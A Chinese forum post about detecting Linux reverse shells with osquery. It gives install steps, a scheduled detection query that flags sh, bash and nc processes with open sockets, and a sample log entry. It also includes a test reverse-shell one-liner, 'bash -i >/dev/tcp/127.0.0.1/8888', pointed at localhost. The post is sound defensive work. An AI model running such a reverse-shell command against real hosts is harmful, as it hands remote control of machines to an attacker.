【技术分享】osquery检测linux反弹shell

原文：https://www.jianshu.com/p/a971cc53347a

由于最近几天在研究日志动态预警的东西。发现一些东西。分享给大家




osquery 安装如下：


Centos 7

1. yum -y install https://osquery-packages.s3.amazonaws.com/centos7/noarch/osquery-s3-centos7-repo-1-0.0.noarch.rpm
   
2. yum -y install osquery

复制代码

其他的自己去网上寻找一下
配置文件如下:

1. [root@localhost ~]# cat /etc/osquery/osquery.conf
   
2. {
   
3.   "options": {
   
4.     "config_plugin": "filesystem",
   
5.     "logger_plugin": "filesystem",
   
6.     "utc": "true"
   
7.   },
   
8.   
   
9.   "schedule": {
   
10.     "system_info": {
    
11.       "query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
    
12.       "interval": 3600
    
13.     },
    
14.         "behavioral_reverse_shell": {
    
15.     "query" : "SELECT DISTINCT(processes.pid), processes.parent, processes.name, processes.path, processes.cmdline, processes.cwd, processes.root, processes.uid, processes.gid, processes.start_time, process_open_sockets.remote_address, process_open_sockets.remote_port, (SELECT cmdline FROM processes AS parent_cmdline WHERE pid=processes.parent) AS parent_cmdline FROM processes JOIN process_open_sockets USING (pid) LEFT OUTER JOIN process_open_files ON processes.pid = process_open_files.pid WHERE (name='sh' OR name='bash' OR name='nc') AND remote_address NOT IN ('0.0.0.0', '::', '');",
    
16.     "interval" : 10,
    
17.     "description" : "Find shell processes that have open sockets"
    
18.     }
    
19.   },
    
20.   "decorators": {
    
21.     "load": [
    
22.       "SELECT uuid AS host_uuid FROM system_info;",
    
23.       "SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;"
    
24.     ]
    
25.   },
    
26.   "packs": {
    
27.   }
    
28. }
    
29. 
    

复制代码

然后启动服务

1. systemctl restart osqueryd
   

复制代码

测试如下:

1. bash -i >/dev/tcp/127.0.0.1/8888 2>&1
   

复制代码

然后再日志中。日志文件如下:/var/log/osquery/osqueryd.results.log

1. [root@localhost ~]# tail -f  /var/log/osquery/osqueryd.results.log
   
2. 
   
3. <blockquote>{"name":"behavioral_reverse_shell","hostIdentifier":"localhost.localdomain","calendarTime":"Sat Jun  1 09:12:30 2019 UTC","unixTime":1559380350,"epoch":0,"counter":880,"decorations":{"host_uuid":"564DBA8F-DC7F-D491-DF58-A9908DA09B80","username":"root"},"columns":{"cmdline":"bash -i","cwd":"/root","gid":"0","name":"bash","parent":"63338","parent_cmdline":"-bash","path":"/usr/bin/bash","pid":"64411","remote_address":"127.0.0.1","remote_port":"8888","root":"/","start_time":"3887087","uid":"0"},"action":"added"}

复制代码

感谢分享哈

强哥威武！！！！！